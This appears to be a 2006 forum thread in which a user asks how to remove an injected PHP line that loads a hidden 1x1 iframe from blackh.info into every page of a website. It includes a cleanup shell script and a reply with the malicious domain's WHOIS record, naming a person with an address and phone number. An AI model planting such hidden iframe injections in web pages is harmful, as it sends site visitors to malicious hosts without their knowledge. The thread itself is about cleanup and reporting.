- 01-03-2006 #1 Just Joined!
- Join Date: Jan 2006
- Posts: 1
my friend's website is virus infected with this code
All the files on one of my friend's websites are virus infected; it has inserted the following code in them.
<? echo ('<html><head><title></title></head><body><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html>');?>
Now I want to replace all the code with nothing.
for a in $(find -type f -not -regex '.*\/\.svn.*'); do sed -e 's/<\?\s echo\s \(\'<html><head><title><\/title><\/head\><body><iframe\s src=\"http:\/\/www\.blackh\.info\/traff\/\"\s width=1\s height=1><\/iframe><\/body><\/html>\'\);\?>//g' $a > $a.modifiedfile; mv -f $a.modifiedfile $a; done
Since he is using Subversion, I can't edit inside .svn folders.
This is not working as I am not comfortable with regex and escape characters.
Please help urgently
Thanks,
AjiNIMC
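Added example, not part of the original post: one way to remove the injected line without any regex escaping is to match it as a literal string, using `grep -F` to find affected files and awk's `index()` to cut the string out, while pruning `.svn` directories. The function names `list_infected`, `strip_payload` and `clean_tree` are hypothetical, and file names are assumed to contain no newlines.

```shell
#!/bin/sh
# Added example (not the poster's code). Matching is literal, so nothing
# in the payload needs escaping.

# The injected line exactly as quoted in the post; read -r keeps it verbatim.
IFS= read -r PAYLOAD <<'EOF'
<? echo ('<html><head><title></title></head><body><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html>');?>
EOF
export PAYLOAD   # awk reads it from ENVIRON, so no escape processing occurs

# list_infected DIR: print files containing the payload, skipping .svn dirs.
list_infected() {
    find "$1" -name .svn -prune -o -type f -exec grep -lF -e "$PAYLOAD" {} +
}

# strip_payload FILE: remove every occurrence of the payload from FILE.
strip_payload() {
    tmp=$(mktemp) || return 1
    awk 'BEGIN { s = ENVIRON["PAYLOAD"]; n = length(s) }
         { while ((i = index($0, s)) > 0)
               $0 = substr($0, 1, i - 1) substr($0, i + n)
           print }' "$1" > "$tmp" &&
    cat "$tmp" > "$1"   # overwrite in place so owner and mode are kept
    rc=$?
    rm -f "$tmp"
    return $rc
}

# clean_tree DIR: clean each infected file and report its name.
# Assumes file names contain no newline characters.
clean_tree() {
    list_infected "$1" | while IFS= read -r f; do
        strip_payload "$f" && printf 'cleaned: %s\n' "$f"
    done
}
```

Run `list_infected .` first and review the list before calling `clean_tree .`. In a Subversion working copy, `svn status` and `svn diff` show which files still differ from the repository afterwards.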
- 01-05-2006 #2
- 01-06-2006 #3
This is where the code is calling to:
Code:
Domain ID:D11497946-LRMS
Domain Name:BLACKH.INFO
Created On:12-Dec-2005 13:09:30 UTC
Last Updated On:12-Dec-2005 16:26:20 UTC
Expiration Date:12-Dec-2006 13:09:30 UTC
Sponsoring Registrar:Direct Information Pvt. Ltd. d/b/a PublicDomainRegistry.com (R159-LRMS)
Status:TRANSFER PROHIBITED
Registrant ID:DI_2202160
Registrant Name:Mihail Krukov
Registrant Organization:N/A
Registrant Street1:Sovnarkomovskaya, 4, 25
Registrant Street2:
Registrant Street3:
Registrant City:Nizhniy Novgorod
Registrant State/Province:Moskovskaya oblast
Registrant Postal Code:606660
Registrant Country:RU
Registrant Phone:+7.8312255554
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant ************@mail.ru
Admin ID:DI_2202160
Admin Name:Mihail Krukov
Admin Organization:N/A
Admin Street1:Sovnarkomovskaya, 4, 25
Admin Street2:
Admin Street3:
Admin City:Nizhniy Novgorod
Admin State/Province:Moskovskaya oblast
Admin Postal Code:606660
Admin Country:RU
Admin Phone:+7.8312255554
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin ************@mail.ru
Billing ID:DI_2202160
Billing Name:Mihail Krukov
Billing Organization:N/A
Billing Street1:Sovnarkomovskaya, 4, 25
Billing Street2:
Billing Street3:
Billing City:Nizhniy Novgorod
Billing State/Province:Moskovskaya oblast
Billing Postal Code:606660
Billing Country:RU
Billing Phone:+7.8312255554
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing ************@mail.ru
Tech ID:DI_2202160
Tech Name:Mihail Krukov
Tech Organization:N/A
Tech Street1:Sovnarkomovskaya, 4, 25
Tech Street2:
Tech Street3:
Tech City:Nizhniy Novgorod
Tech State/Province:Moskovskaya oblast
Tech Postal Code:606660
Tech Country:RU
Tech Phone:+7.8312255554
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech ************@mail.ru
Name Server:NS1.MEGAHOSTER.NET
Name Server:NS2.MEGAHOSTER.NET

Hope that this is a help for you.
I would also send a copy of the code to megahoster.net and let them know what is going on.



